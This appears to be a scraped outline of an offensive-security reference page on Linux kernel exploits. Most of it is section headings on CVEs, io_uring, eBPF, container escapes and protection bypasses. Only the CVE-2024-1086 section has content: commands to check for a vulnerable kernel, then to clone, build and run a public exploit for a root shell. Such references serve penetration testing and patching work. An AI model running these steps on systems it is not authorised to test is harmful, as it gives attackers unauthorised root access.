Linux Kernel Exploits
Kernel Exploit Landscape
Quick Version Check
# Get kernel version
uname -r
cat /proc/version
# Check for known vulnerabilities
# https://github.com/lucyoa/kernel-exploits
# https://github.com/briskets/linux-exploit-suggesterRecent Critical CVEs
CVE-2024-1086 (nf_tables Use-After-Free)
# Affects: Linux kernel < 6.8
# Type: Use-after-free in netfilter nf_tables
# Impact: Local privilege escalation
# Check if vulnerable
cat /proc/version # < 6.8
lsmod | grep nf_tables
# Exploit: https://github.com/Notselwyn/CVE-2024-1086
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make
./exploit
# Expected: Root shellCVE-2023-32233 (nf_tables Batch Request UAF)
CVE-2023-2640 & CVE-2023-32629 (GameOver(lay))
CVE-2023-0386 (OverlayFS Privilege Escalation)
CVE-2022-0847 (DirtyPipe)
CVE-2022-2588 (route4 UAF)
io_uring Vulnerabilities
Overview
CVE-2024-0582 (io_uring PBUF UAF)
CVE-2023-2598 (io_uring UAF)
Disable io_uring (Mitigation)
eBPF Exploits
Attack Surface
CVE-2023-2163 (eBPF Verifier Bypass)
Mitigation
Container Escape Exploits
CVE-2024-21626 (runc Container Escape)
CVE-2022-0492 (cgroup Escape)
Exploitation Techniques
Heap Exploitation
ROP in Kernel
ret2usr (If No SMEP/SMAP)
Modprobe Path Overwrite
Kernel Protection Bypass
KASLR Bypass
SMEP/SMAP Bypass
Tools
Quick Reference
CVE
Kernel Versions
Type
Related Topics
Last updated
Was this helpful?